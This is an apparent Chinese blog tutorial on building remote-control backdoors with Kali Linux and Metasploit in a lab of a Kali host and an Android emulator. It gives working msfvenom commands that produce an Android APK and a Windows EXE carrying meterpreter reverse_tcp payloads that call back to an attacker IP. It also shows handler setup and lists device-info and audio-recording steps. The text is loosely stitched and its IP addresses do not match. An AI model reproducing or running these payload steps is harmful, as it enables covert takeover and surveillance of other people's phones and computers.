admin 管理员组

文章数量: 887019

一、复现环境
Kali平台(Hack):192.168.25.128
靶机:192.168.25.106
Android模拟器(靶机1):192.168.25.106
注意,手机端控制必须使手机和攻击端在同一个网段

二、环境配置二Android模拟器
2.1首先从官网上下载模拟器雷电地址点击打开链接

2.2下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。
问题:你尝试安装的应用不是microsoft验证的应用
解决方法

  1. 点击左下角“开始”,打开“设置”。
  2. 选择“应用”。
  3. 在选择获取应用的位置下面,有四个选项(如下图所示)。像出现上文中的提示,就是选择了【任何来源,但在安装不是Microsoft Store提供的应用之前向我发出警告】。
  4. 为了避免出现上文中的提示,我们可以选择【任何来源】或者【任何来源,但如果Microsoft Store中有类似的应用,请告诉我】。
  5. 如果选择【仅 Microsoft Store (推荐)】,那么从非应用商店下载的程序,都是无法运行的,所以尽量不要选择这个选项。

    三、生成后门
    3.1打开虚拟机,启动kali,打开终端,生成apk后门。lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001。打开终端输入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R >222.apk
    (生成apk文件)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

解决方法:

在终端输入 “netstat -tulpen”,查看进程端口信息。

命令”fuser -k 端口号/tcp“,删除80端口进程

使用metasploit控制台对模拟器进行攻击
打开msf
电脑端控制:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

安卓手机端控制:
将APK安装到雷电模拟器,启动exploit的时候双击运行MainActivity


获取版本和网络信息

录音操作

本文标签: 后门 远程控制 电脑 手机 kali